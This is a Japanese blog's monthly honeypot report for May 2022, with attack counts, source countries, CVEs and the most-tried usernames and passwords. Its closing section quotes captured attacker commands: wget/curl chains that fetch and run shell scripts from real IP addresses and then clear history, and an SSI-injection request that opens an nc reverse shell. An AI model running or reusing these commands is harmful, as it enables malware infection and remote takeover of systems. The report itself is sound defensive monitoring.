Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2022年5月)

  • 現地時間の5月26日にBroadcom社がVMware社を約 610 億ドルにて買収した。
  • VMware社自体は1998年に創業後、2004年にEMC社に買収され、2015年にDell社に約670億ドルで買収されている。Dell社は2021年にVMwareを新会社として独立させていることから、紆余曲折があったもののまた買収されるようだ。
  • VMware社自体は2022年度に赤字経営に傾いており、VMware社側にとってもメリットがある。VMware製品を利用するユーザへの影響は最小限に抑えられることを願う。

参考URL:
https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/company/vmware-broadcom.pdf



T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2022年5月1日-2021年5月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 1,596,399 -56,518
2 Ddospot 958,728 727,589
3 Honeytrap 908,394 107,980
4 Heralding 835,748 158,867
5 Dionaea 357,741 14,016
6 Mailoney 16,039 -98,271
7 Adbhoney 14,298 1,686
8 Tanner 6,660 1,560
9 Redishoneypot 4,488 2,941
10 Ciscoasa 2,957 183
11 CitrixHoneypot 2,884 1,097
12 ConPot 2,119 -158
13 Medpot 1,534 577
14 ElasticPot 886 122
15 Ipphoney 211 128
16 Dicompot 156 53
  • Result
    • Ddospot、Honeytrap、Heraldingのアクセス件数が増加していた。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Netherlands 735,190 1(→)
2 UnitedStates 657,151 4(↑)
3 China 616,852 3(→)
4 Russia 428,832 2(↓)
5 Japan 277,748 10(↑)
6 Germany 182,942 15(↑)
7 Bangladesh 103,276 圏外(↑)
8 Brazil 102,983 13(↑)
9 Palestine 92,606 圏外(↑)
10 India 91,008 9(↓)
11 Singapore 89,891 8(↓)
12 SouthKorea 84,615 14(↑)
13 France 82,374 6(↓)
14 Vietnam 77,827 11(↓)
15 Romania 75,820 圏外(↑)
16 UnitedKingdom 72,204 20(↑)
17 SouthAfrica 70,191 圏外(↑)
18 HongKong 53,616 圏外(↑)
19 Indonesia 47,570 17(↓)
20 Sweden 31,900 19(↓)
  • Result
    • ロシアからのアクセスが減少した一方でアメリカからのアクセスが増えていた。
    • 日本からのアクセスも増加傾向にあった。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 173,085
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 59
3 CVE-2020-11910 28
  • Result
    • 先月から変更なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 127,653
2 sa 16,527
3 admin 8,218
4 user 6,096
5 nproc 6,087
6 test 3,515
7 2,212
8 postgres 1,680
9 22 1,307
10 ubuntu 1,293
11 oracle 812
12 ftpuser 687
13 2Wire 665
14 git 655
15 !root 653
16 support 578
17 www 518
18 guest 498
19 web 440
20 mysql 432
21 ftp 406
22 adm 391
23 student 356
24 deploy 354
25 debug 340
26 666666 334
27 minecraft 334
28 testuser 329
29 0 328
30 $ALOC$ 325
31 administrator 325
32 blank 321
33 unknown 321
34 user1 309
35 anonymous 293
36 teamspeak 278
37 hadoop 268
38 Admin 266
39 data 258
40 jenkins 257
41 server 256
42 db 246
43 wwwroot 244
44 www-data 242
45 tomcat 231
46 ts3 226
47 nagios 218
48 test1 215
49 dev 186
50 pi 169
  • Result
    • 先月から変更なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 nproc 6,087
2 123456 6,086
3 3,819
4 admin 3,324
5 1 2,900
6 password 2,393
7 123 2,191
8 12345 1,437
9 1234 1,412
10 12345678 1,076
11 root 1,046
12 blank 987
13 0 764
14 test 694
15 user 534
16 123123 526
17 qwerty 521
18 666666 505
19 111111 461
20 1q2w3e4r 455
21 123456789 454
22 ubnt 427
23 00000000 418
24 master 417
25 1qaz2wsx 412
26 pass 403
27 alpine 396
28 abc123 389
29 support 384
30 backup 377
31 1234567 364
32 hi3518 340
33 123qwe 335
34 P@ssw0rd 325
35 admin123 308
36 _Cisco 304
37 10023 302
38 synnet 297
39 unknown 297
40 !ishtar 294
41 test123 282
42 1234567890 272
43 p@ssw0rd 259
44 1qaz@WSX 218
45 q1w2e3r4 217
46 123321 216
47 password123 203
48 Passw0rd 190
49 qwe123 190
50 changeme 186
  • Result
    • changeme(50位)はsplunkの管理者ユーザである「splunkadmin」アカウントのパスワードのようだ。利用に際しては注意が必要である。
      jp.tenable.com

    • 過去のパスワード関連の記事を見るとパスワード運用の本質は10年以上前から変わっていないことが分かる。 www.itmedia.co.jp


⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • 特記事項は無し。

最後に

  • MS-MSDT/Follina(CVE-2022-30190)の脆弱性にてOfficeを開いただけでRCEが発生する事象が発生しているとのこと。
  • セキュリティの古典である『カッコウはコンピュータに卵を産む』 がtwitterで紹介されていたので今度読んでみたいと思う。
◆shファイルに関するアクセス
"cd /tmp ; wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; yum remove wget -y ; yum install wget -y ; apt-get remove wget -y ; apt-get install wget -y ; wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh

wget http://204.15.75.59/jwsn.sh

"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.161.17.72/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 103.161.17.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c"

/incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e

"cd /data/local/tmp/; busybox wget http://194.31.98.205/w.sh; sh w.sh; curl http://194.31.98.205/c.sh; sh c.sh",


◆exeファイルに関するアクセス
なし